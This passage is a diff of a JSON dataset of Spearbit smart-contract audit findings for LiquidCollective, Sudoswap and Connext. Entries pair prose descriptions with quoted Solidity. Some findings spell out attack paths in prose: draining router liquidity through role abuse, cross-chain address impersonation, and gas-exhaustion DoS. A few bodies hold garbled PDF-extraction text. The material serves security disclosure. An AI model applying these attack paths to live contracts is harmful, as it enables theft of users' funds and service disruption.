n-k] where n can be any number and k is a large number equal to exitableOperatorCount - 1, and _count is also large, the function can become extremely gas-intensive. The main consequence of such a potential issue is that the function may not release enough liquidity to the RedeemManager contract, resulting in partial fulfillment of redemption requests. Similarly, _pickNextValidatorsToDepositFromActiveOperators is also very gas-intensive. If the number of desired validators and current operators (including fundable operators) are high enough, depositToConsensusLayer is no longer callable.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Medium Risk" + ] + }, + { + "title": "The validator count to exit in _requestExitsBasedOnRedeemDemandAfterRebalancings assumes that the to-be selected validators are still active and have not been penalised.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The validatorCountToExit is calculated as follows: uint256 validatorCountToExit = LibUint256.ceil( redeemManagerDemandInEth - (availableBalanceToRedeem + exitingBalance + preExitingBalance), DEPOSIT_SIZE ); This formula assumes that the validators to be selected by pickNextValidatorsToExit: 1. Are still active, 2. Have not been queued to be exited, and 3. Have not been penalized, with a balance of at least MAX_EFFECTIVE_BALANCE.
Have not been penalized and their balance is at least MAX_EFFECTIVE_BALANCE", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Burn RedeemManager's share first before calling its reportWithdraw endpoint", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The current implementation of _reportWithdrawToRedeemManager calls RedeemManager's reportWithdraw and then burns the corresponding shares for the RedeemManager: // perform a report withdraw call to the redeem manager redeemManager_.reportWithdraw{value: suppliedRedeemManagerDemandInEth}(suppliedRedeemManagerDemand); // we burn the shares of the redeem manager associated with the amount of eth provided _burnRawShares(address(RedeemManagerAddress.get()), suppliedRedeemManagerDemand);", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "OracleManager allows reporting for the same epoch multiple times, leading to unknown behavior.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Currently, it is possible for the oracle to report on the same epoch multiple times, because _isValidEpoch checks that the report's epoch >= LastConsensusLayerReport.get().epoch. This can lead the contract to unspecified behavior: the code will revert if the report increases the balance, not with an explicit check but due to a subtraction underflow (since maxIncrease == 0), while allowing other code paths to execute to completion.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Missing event emit when user calls deposit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Whenever BalanceToDeposit is updated, the protocol should emit a SetBalanceToDeposit event, but when a user calls UserDepositManager.deposit, the event is never emitted, which could break tooling.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Reset the report data and increment the last epoch id before calling River's setConsensusLayerData when a quorum is made", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The current implementation of reportConsensusLayerData calls river.setConsensusLayerData(report) first when a quorum is made, then resets the report variant and position data, and increments the last epoch id afterward: // if adding this vote reaches quorum if (variantVotes + 1 >= quorum) { // we push the report to river river.setConsensusLayerData(report); // we clear the reporting data _clearReports(); // we increment the lastReportedEpoch to force reports to be on the last frame LastEpochId.set(lastReportedEpochValue + 1); emit SetLastReportedEpoch(lastReportedEpochValue + 1); } In a future version of the protocol there might be a possibility for an oracle member to call back into reportConsensusLayerData when river.setConsensusLayerData(report) is called, which would open a reentrancy vector for compromised/malicious oracle members.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Update BufferedExceedingEth before calling sendRedeemManagerExceedingFunds", + "html_url": 
"https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "In pullExceedingEth , River's sendRedeemManagerExceedingFunds is called before updating the RedeemManager's BufferedExceedingEth storage value _river().sendRedeemManagerExceedingFunds{value: amountToSend}(); BufferedExceedingEth.set(BufferedExceedingEth.get() - amountToSend);", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Any oracle member can censor almost quorum report variants by resetting its address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The admin or an oracle member can DoS or censor almost quorum reports by calling setMember endpoint which would reset the report variants and report positions. The admin also can reset the/clear the reports by calling other endpoints by that should be less of an issue compared to just an oracle member doing that.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Incentive mechanism that encourages operators to respond quickly to exit requests might diminish under certain condition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "/// @notice Retrieve all the active and fundable operators /// @dev This method will return a memory array of length equal to the number of operator, but /// @dev populated up to the fundable operator count, also returned by the method /// @return The list of active and fundable operators /// @return The count of active and fundable operators function getAllFundable() internal view returns (CachedOperator[] memory, uint256) { // uint32[] storage stoppedValidatorCounts = getStoppedValidators(); for (uint256 idx = 0; idx < operatorCount;) { _hasFundableKeys(r.value[idx]) && _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits only @audit-ok File: Operators.2.sol 153: 154: ,! 155: 156: 157: 158: ,! ..SNIP.. 172: 173: 174: 175: 176: 177: ,! 178: if ( ) { r.value[idx].requestedExits is the accumulative number of requested validator exits by the protocol _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) function is a value reported by oracle members which consist of both exited and slashed validator counts It was understood the rationale of having the _getStoppedValidatorCountAtIndex(stoppedValidatorCounts, idx) >= r.value[idx].requestedExits conditional check at Line 177 above is to incentivize operators to re- In other words, an operator with a re- spond quickly to exit requests if they want new stakes from deposits. questedExits value larger than the _getStoppedValidatorCountAtIndex count indicates that an operator did not submit exit requests to the Consensus Layer (CL) in a timely manner or the exit requests have not been finalized in CL. However, it was observed that the incentive mechanism might not work as expected in some instances. Consider the following scenario: Assuming an operator called A has 5 slashed validators and 0 exited validators, the _getStoppedValidator- CountAtIndex function will return 5 for A since this function takes into consideration both stopped and slashed validators. Also, assume that the requestedExits of A is 5, which means that A has been instructed by the protocol to submit 5 exit requests to CL. 
In this case, the incentive mechanism seems to diminish as A will still be considered a fundable operator even if A does not respond to exit requests, since the number of slashed validators is enough to \"help\" push up the stopped validator count to satisfy the condition, giving the wrong impression that A has already submitted the exit requests. As such, A will continue to be selected to stake new deposits.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "RedeemManager._claimRedeemRequests transaction sender might be tricked to pay more ETH in transaction fees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The _claimRedeemRequests function is designed to allow anyone to claim ETH on behalf of another party who has a valid redeem request. The function iterates through the redeemRequestIds list and fulfills each request individually. However, it is important to note that the transfer of ETH to the recipients is only limited by the 63/64 rule, which means that it is possible for a recipient to take advantage of a heavy fallback function and potentially cause the sender to pay a significant amount of unwanted transaction fees.", + "labels": [ + "Spearbit", + "LiquidCollective3", + "Severity: Low Risk" + ] + }, + { + "title": "Claimable LsETH on the Withdraw Stack could exceed total LsETH requested on the Redeem Queue", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Let the total amount of claimable LsETH on the Withdraw Stack be x and the total amount of LsETH requested on the Redeem Queue be y. The following points are extracted from the Withdrawals Smart Contract Architecture documentation: The design ensures that x <= y. Refer to page 15 of the documentation. It is impossible for a redeem request to be claimed before at least one Oracle report has occurred, so it is impossible to skip a slashing time penalty. Refer to page 16 of the documentation. Based on the above information, the main purpose of the design (x <= y) is to avoid favorable treatment of LsETH holders that would request a redemption before others following a slashing incident. However, this constraint (x <= y) is not being enforced in the contract. The reporter could continue to report withdrawals via the RedeemManager.reportWithdraw function until the point where x > y. If x > y, LsETH holders could request a redemption before others following a slashing incident to gain an advantage.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Informational" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "IERC1155 not utilized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The contract LSSVMPair references IERC1155, but does not utilitze the interface within LSSVMPair.sol. import {IERC1155} from \"@openzeppelin/contracts/token/ERC1155/IERC1155.sol\"; The struct TokenToTokenTrade is dened in LSSVMRouter, but the contract does not utilize the interface either. 
struct TokenToTokenTrade { PairSwapSpecific[] tokenToNFTTrades; PairSwapSpecific[] nftToTokenTrades; } It is better to remove unused code due to potential confusion.", + "title": "An oracle member can resubmit data for the same epoch multiple times if the quorum is set to 1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "If the quorum is set to 1 and the difference between the report's epoch e and LastEpochId.get() is Δe, an oracle member will be able to call reportConsensusLayerData Δe + 1 times to push its report for epoch e to the protocol, with different data each time (the only restriction on successive reports is that the difference of underlying balance between reports would need to be negative, since the maxIncrease will be 0). Note that in reportConsensusLayerData the first storage write to LastEpochId will be overwritten later due to the quorum of one: x = LastEpochId -> report.epoch -> x + 1", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Informational" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "Use Fractions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "In some occasions percentages are indicated in a number format ending in e17. It is also possible to use fractions of e18. Considering e18 is the standard base format, using fractions might be easier to read. 43 LSSVMPairFactory.sol#L28 LSSVMPair.sol#L25", + "title": "Report's validatorsCount's historical non-decreasingness does not get checked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Once the Oracle members come to a quorum for a selected report variant, the validators count is stored in storage. Note that validatorsCount is supposed to represent the total cumulative number of validators ever funded on the consensus layer (even if they have been slashed or exited at some point). So this value is supposed to be a non-decreasing function of reported epochs. But this invariant is never checked in setConsensusLayerData.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Informational" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "Two families of token libraries used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", - "body": "The Sudoswap contract imports token libraries from both Open- Zeppelin and Solmate. If Sudoswap sticks within one library family, then it will not be necessary to track potential issues from two separate families of libraries.", + "title": "The report's slashingContainmentMode and bufferRebalancingMode are decided by the oracle members which affects the exiting strategy of validators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The current protocol leaves it up to the oracle members to come to a quorum to set either report.slashingContainmentMode or report.bufferRebalancingMode to true or false. That means the oracle members have the power to decide off-chain whether validators should be exited and whether some of the deposit balance should be reallocated for redeeming (vs an algorithmic decision by the protocol on-chain). 
A potential bad scenario would be oracle members deciding not to signal for new validators to exit, and between the current epoch and the next report some validators get penalized or slashed, which would reduce the underlying value of the shares. If those validators had exited before getting slashed or penalized, the redeemers would have received more ETH back for their investment.", "labels": [ "Spearbit", - "Sudoswap", - "Severity: Informational" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "swapInternal() shouldn't use msg.sender", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "As reported by the Connext team, the internal stable swap checks if msg.sender has sufficient funds on execute(). This msg.sender is the relayer which normally wouldn't have these funds so the swaps would fail. The local funds should come from the Connext diamond itself. BridgeFacet.sol function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { ... (uint256 amountOut, address asset, address local) = _handleExecuteLiquidity(...); ... } function _handleExecuteLiquidity(...) ... { ... (uint256 amount, address adopted) = AssetLogic.swapFromLocalAssetIfNeeded(...); ... } AssetLogic.sol function swapFromLocalAssetIfNeeded(...) ... { ... return _swapAsset(...); } function _swapAsset(... ) ... { ... SwapUtils.Swap storage ipool = s.swapStorages[_key]; if (ipool.exists()) { // Swap via the internal pool. return ... ipool.swapInternal(...) ... } } SwapUtils.sol function swapInternal(...) ... { IERC20 tokenFrom = self.pooledTokens[tokenIndexFrom]; require(dx <= tokenFrom.balanceOf(msg.sender), \"more than you own\"); ... } // msg.sender is the relayer", + "title": "Anyone can call depositToConsensusLayer and potentially push wrong data on-chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Anyone can call depositToConsensusLayer and potentially push wrong data on-chain. An example is when an operator would want to remove a validator key that is not yet funded but has an index below the operator limit and will be picked by the strategy if depositToConsensusLayer is called. Anyone can then front-run the operator's removal call and force-push this validator's info to the deposit contract.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Low Risk" ] }, { - "title": "MERKLE.insert does not return the updated tree leaf count", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The NatSpec comment for insert is * @return uint256 Updated count (number of nodes in the tree). But that is not true. If the updated count is 2k (2n + 1) where k , n 2 N [ 0 then the return value would be 2n + 1. Currently, the returned value of insert is not being used, otherwise, this could be a bigger issue.", + "title": "Calculation of currentMaxCommittableAmount can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "currentMaxCommittableAmount is calculated as: // we adapt the value for the reporting period by using the asset balance as upper bound uint256 underlyingAssetBalance = _assetBalance(); uint256 currentBalanceToDeposit = BalanceToDeposit.get(); ... 
uint256 currentMaxCommittableAmount = LibUint256.min( LibUint256.min(underlyingAssetBalance, (currentMaxDailyCommittableAmount * period) / 1 days), currentBalanceToDeposit ); But underlyingAssetBalance is Bu = Bv + Bd + Bc + Br + 32(Cd - Cr), which is greater than currentBalanceToDeposit (Bd) since the other components are non-negative values. The parameters are: Bv = LastConsensusLayerReport.get().validatorsBalance, Bd = BalanceToDeposit.get(), Bc = CommittedBalance.get(), Br = BalanceToRedeem.get(), Cd = DepositedValidatorCount.get(), Cr = LastConsensusLayerReport.get().validatorsCount, M = currentMaxCommittableAmount, m = (currentMaxDailyCommittableAmount * period) / 1 days, Bu = underlyingAssetBalance. Note that Cd >= Cr is an invariant that is enforced by the protocol, and so currently we are computing M as: M = min(Bu, Bd, m) = min(Bd, m) since Bu >= Bd.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "PolygonSpokeConnector or PolygonHubConnector can get compromised and DoSed if an address(0) is passed to their constructor for _mirrorConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "PolygonSpokeConnector (PolygonHubConnector) inherits from SpokeConnector (HubConnector) and FxBaseChildTunnel (FxBaseRootTunnel). When PolygonSpokeConnector (PolygonHubConnector) gets de- ployed and its constructor is called, if _mirrorConnector == address(0) then setting the mirrorConnector stor- age variable is skipped: // File: Connector.sol#L118-L121 if (_mirrorConnector != address(0)) { _setMirrorConnector(_mirrorConnector); } Now since the setFxRootTunnel (setFxChildTunnel) is an unprotected endpoint that is not overridden by it and assign their own fxRootTunnel PolygonSpokeConnector (PolygonHubConnector) anyone can call (fxChildTunnel) address (note, fxRootTunnel (fxChildTunnel) is supposed to correspond to mirrorConnector on the destination domain). the require statement in setFxRootTunnel (setFxChildTunnel) only allows fxRootTunnel Note that (fxChildTunnel) to be set once (non-zero address value) so afterward even the owner cannot update this value. If at some later time the owner tries to call setMirrorConnector to assign the mirrorConnector, since _setMir- rorConnector is overridden by PolygonSpokeConnector (PolygonHubConnector) the following will try to execute: 9 // File: PolygonSpokeConnector.sol#L78-L82 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxRootTunnel(_mirrorConnector); } Or for PolygonHubConnector: // File: PolygonHubConnector.sol#L51-L55 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } But this will revert since fxRootTunnel (fxChildTunnel) is already set. Thus if the owner of PolygonSpokeConnec- tor (PolygonHubConnector) does not provide a non-zero address value for mirrorConnector upon deployment, a malicious actor can set fxRootTunnel which will cause: 1. Rerouting of messages from Polygon to Ethereum to an address decided by the malicious actor (or vice versa for PolygonHubConnector). 2. DoSing the setMirrorConnector and setFxRootTunnel (fxChildTunnel) endpoints for the owner. 
PolygonSpokeConnector's", + "title": "Remove redundant array length check and variable to save gas.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "When someone calls ConsensusLayerDepositManager.depositToConsensusLayer, the contract will verify that the receivedSignatureCount matches the receivedPublicKeyCount returned from _getNextVal- idators. This is unnecessary as the code always creates them with the same length.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "A malicious owner or user with a Role.Router role can drain a router's liquidity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "A malicious owner or user with Role.Router Role denominated as A in this example, can drain a router's liquidity for a current router (a router that has already been added to the system and might potentially have added big liquidities to some assets). Here is how A can do it (can also be done atomically): 1. Remove the router by calling removeRouter. 2. Add the router back by calling setupRouter and set the owner and recipient parameters to accounts A has access to / control over. 3. Loop over all tokens that the router has liquidity and call removeRouterLiquidityFor to drain/redirect the funds into accounts A has control over. That means all routers would need to put their trust in the owner (of this connext instance) and any user who has a Role.Router Role with their liquidity. So the setup is not trustless currently.", + "title": "Duplicated events emitted in River and RedeemManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The amount of ETH pulled from the redeem contract when setConsensusData is called by the oracle is notified with events in both RedeemManager and River contracts.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "Users are forced to accept any slippage on the destination chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The documentation mentioned that there is cancel function on the destination domain that allows users to send the funds back to the origin domain, accepting the loss incurred by slippage from the origin pool. However, this feature is not found in the current codebase. If the high slippage rate persists continuously on the destination domain, the users will be forced to accept the high slippage rate. Otherwise, their funds will be stuck in Connext.", + "title": "totalRequestedExitsValue's calculation can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "In the for loop in this context, totalRequestedExitsValue is updated for every operator that sat- isfies _getActiveValidatorCountForExitRequests(operators[idx]) == highestActiveCount. 
Based on the used increments, their sum equals optimalTotalDispatchCount.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "Preservation of msg.sender in ZkSync could break certain trust assumption", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "For ZkSync chain, the msg.sender is preserved for L1 -> L2 calls. One of the rules when pursuing a cross-chain strategy is to never assume that address control between L1 and L2 is always guaranteed. For EOAs (i.e., non-contract accounts), this is generally true that any account that can be accessed on Ethereum will also be accessible on other EVM-based chains. However, this is not always true for contract-based accounts as the same account/wallet address might be owned by different persons on different chains. This might happen if there is a poorly implemented smart contract wallet factory on multiple EVM-based chains that deterministically deploys a wallet based on some user-defined inputs. For instance, if a smart contract wallet factory deployed on both EVM-based chains uses deterministic CREATE2 which allows users to define its salt when deploying the wallet, Bob might use ABC as salt in Ethereum and Alice might use ABC as salt in Zksync. Both of them will end up getting the same wallet address on two different chains. A similar issue occurred in the Optimism-Wintermute Hack, but the actual incident is more complicated. Assume that 0xABC is a smart contract wallet owned and deployed by Alice on ZkSync chain. Alice performs a xcall from Ethereum to ZkSync with delegate set to 0xABC address. Thus, on the destination chain (ZkSync), only Alice's smart contract wallet 0xABC is authorized to call functions protected by the onlyDelegate modifier. 11 Bob (attacker) saw that the 0xABC address is not owned by anyone on Ethereum. Therefore, he proceeds to take ownership of the 0xABC by interacting with the wallet factory to deploy a smart contract wallet on the same address on Ethereum. Bob can do so by checking out the inputs that Alice used to create the wallet previously. Thus, Bob can technically make a request from L1 -> L2 to impersonate Alice's wallet (0xABC) and bypass the onlyDelegate modifier on ZkSync. Additionally, Bob could make a L1 -> L2 request by calling the ZKSync's BridgeFacet.xcall directly to steal Alice's approved funds. Since the xcall relies on msg.sender, it will assume that the caller is Alice. This issue is only specific to ZkSync chain due to the preservation of msg.sender for L1 -> L2 calls. For the other chains, the msg.sender is not preserved for L1 -> L2 calls and will always point to the L2's AMB forwarding the requests.", + "title": "Report's bufferRebalancingMode and slashingContainmentMode are only used during the reporting transaction process", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "report.bufferRebalancingMode and report.slashingContainmentMode are only used during the reporting transaction and their previous values are not used in the protocol. They can be removed from being added to the stored report. 
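A sketch of what the stored report could look like with the two transient flags dropped, per this suggestion (field set taken from the StoredConsensusLayerReport definition quoted in a later finding; illustrative only):

```solidity
// Illustrative trimmed version of StoredConsensusLayerReport: the two mode
// flags only influence the processing transaction itself, so they would no
// longer be persisted.
struct StoredConsensusLayerReport {
    uint256 epoch;
    uint256 validatorsBalance;
    uint256 validatorsSkimmedBalance;
    uint256 validatorsExitedBalance;
    uint256 validatorsExitingBalance;
    uint32 validatorsCount;
    // bufferRebalancingMode / slashingContainmentMode removed; historical
    // values remain recoverable from the ProcessedConsensusLayerReport event.
}
```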
Note that their historical values can be queried by listening to the ProcessedConsensusLayerReport(report, vars.trace) events.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Gas Optimization" ] }, { - "title": "No way to update a Stable Swap once assigned to a key", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Once a Stable Swap is assigned to a key (the hash of the canonical id and domain for token), it cannot be updated nor deleted. A Swap can be hacked or an improved version may be released which will warrant updating the Swap for a key.", + "title": "Add more comments/documentation for ConsensusLayerReport and StoredConsensusLayerReport structs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "The ConsensusLayerReport and StoredConsensusLayerReport structs are defined as /// @notice The format of the oracle report struct ConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; uint32[] stoppedValidatorCountPerOperator; bool bufferRebalancingMode; bool slashingContainmentMode; } /// @notice The format of the oracle report in storage struct StoredConsensusLayerReport { uint256 epoch; uint256 validatorsBalance; uint256 validatorsSkimmedBalance; uint256 validatorsExitedBalance; uint256 validatorsExitingBalance; uint32 validatorsCount; bool bufferRebalancingMode; bool slashingContainmentMode; } Comments regarding their specified fields are lacking.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Renouncing ownership or admin role could affect the normal operation of Connext", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Consider the following scenarios. Instance 1 - Renouncing ownership All the contracts that extend from ProposedOwnable or ProposedOwnableUpgradeable inherit a method called renounceOwnership. The owner of the contract can use this method to give up their ownership, thereby leaving the contract without an owner. If that were to happen, it would not be possible to perform any owner-specific functionality on that contract anymore. The following is a summary of the affected contracts and their impact if the ownership has been renounced. 12 One of the most significant impacts is that Connext's message system cannot recover after a fraud has been resolved since there is no way to unpause and add the connector back to the system. Instance 2 - Renouncing admin role All the contracts that extend from ProposedOwnableFacet inherit a method called revokeRole. 1. Assume that the Owner has renounced its power and the only Admin remaining used revokeRole to re- nounce its Admin role. 2. Now the contract is left with Zero Owner & Admin. 3. All swap operations collect adminFees via SwapUtils.sol contract. In absence of any Admin & Owner, these fees will get stuck in the contract with no way to retrieve them. Normally it would have been withdrawn using withdrawSwapAdminFees|SwapAdminFacet.sol. 4. 
This is simply one example, there are multiple other critical functionalities impacted once both Admin and Owner revoke their roles.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { + "title": "postUnderlyingBalanceIncludingExits and preUnderlyingBalanceIncludingExits can be removed from setConsensusLayerData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "Both postUnderlyingBalanceIncludingExits (Bu^post) and preUnderlyingBalanceIncludingExits (Bu^pre) include the skimmed and exited amounts accumulated over time, part of which might have exited the protocol through redeeming (or been skimmed back to CL and penalized). Their delta is almost the same as the delta of vars.postReportUnderlyingBalance and vars.preReportUnderlyingBalance (exactly the same if one adds a check that validator counts are non-decreasing). Notation: Bu^post: postUnderlyingBalanceIncludingExits; Bu^pre: preUnderlyingBalanceIncludingExits; ΔBu: Bu^post - Bu^pre; Bu^report,post: vars.postReportUnderlyingBalance; Bu^report,pre: vars.preReportUnderlyingBalance; ΔBu^report: Bu^report,post - Bu^report,pre; Bv^prev: previous reported/stored value for total validator balances in CL (LastConsensusLayerReport.get().validatorsBalance); Bv^curr: current reported value of total validator balances in CL (report.validatorsBalance); ΔBv: Bv^curr - Bv^prev (can be negative); Bs^prev: LastConsensusLayerReport.get().validatorsSkimmedBalance; Bs^curr: report.validatorsSkimmedBalance; ΔBs: Bs^curr - Bs^prev (always non-negative, this is an invariant that gets checked); Be^prev: LastConsensusLayerReport.get().validatorsExitedBalance; Be^curr: report.validatorsExitedBalance; ΔBe: Be^curr - Be^prev (always non-negative, this is an invariant that gets checked); C^prev: LastConsensusLayerReport.get().validatorsCount; C^curr: report.validatorsCount; ΔC: C^curr - C^prev (this value should be non-negative; note this invariant has not been checked in the codebase); C^deposit: DepositedValidatorCount.get(); Bd: BalanceToDeposit.get(); Bc: CommittedBalance.get(); Br: BalanceToRedeem.get(). Note that the above values are assumed to be in their form before the current report gets stored in storage. Then we would have Bu^post = Bv^curr + Bs^curr + Be^curr + Bd + Bc + Br + 32(C^deposit - C^curr) = Bu^pre + ΔBv + ΔBs + ΔBe - 32ΔC, and so: ΔBu = ΔBv + ΔBs + ΔBe - 32ΔC = ΔBu^report.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "No way of removing Fraudulent Roots", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Fraudulent Roots cannot be removed once fraud is detected by the Watcher. This means that Fraud Roots will be propogated to each chain.", + "title": "The formula or the parameter names for calculating currentMaxDailyCommittableAmount can be made more clear", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", + "body": "currentMaxDailyCommittableAmount is calculated using the below formula: // we compute the max daily committable amount by taking the asset balance without the balance to deposit into account uint256 currentMaxDailyCommittableAmount = LibUint256.max( dcl.maxDailyNetCommittableAmount, (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - 
currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX ); Therefore its value is the maximum of two potential maximum values.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: High Risk" + "LiquidCollective3", + "Severity: Informational" ] }, { - "title": "Large number of inbound roots can DOS the RootManager", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "It is possible to perform a DOS against the RootManager by exploiting the dequeueVerified function or insert function of the RootManager.sol. The following describes the possible attack path: 1. Assume that a malicious user calls the permissionless GnosisSpokeConnector.send function 1000 times (or any number of times that will cause an Out-of-Gas error later) within a single transaction/block on Gnosis causing a large number of Gnosis's outboundRoots to be forwarded to GnosisHubConnector on Ethereum. 2. Since the 1000 outboundRoots were sent at the same transaction/block earlier, all of them should arrive at the GnosisHubConnector within the same block/transaction on Ethereum. 13 3. For each of the 1000 outboundRoots received, the GnosisHubConnector.processMessage function will be triggered to process it, which will in turn call the RootManager.aggregate function to add the received out- boundRoot into the pendingInboundRoots queue. As a result, 1000 outboundRoots with the same commit- Block will be added to the pendingInboundRoots queue. 4. After the delay period, the RootManager.propagate function will be triggered. The function will call the dequeueVerified function to dequeue 1000 verified outboundRoots from the pendingInboundRoots queue by looping through the queue. This might result in an Out-of-Gas error and cause a revert. 5. If the above dequeueVerified function does not revert, the RootManager.propagate function will attempt to insert 1000 verified outboundRoots to the aggregated Merkle tree, which might also result in an Out-of-Gas error and cause a revert. If the RootManager.propagate function reverts when called, the latest aggregated Merkle root cannot be forwarded to the spokes. As a result, none of the messages can be proven and processed on the destination chains. Note: the processing on the Hub (which is on mainnet) can also become very expensive, as the mainnet usually as a far higher gas cost than the Spoke.", + "title": "preExitingBalance is a rough estimate for signalling the number of validators to request to 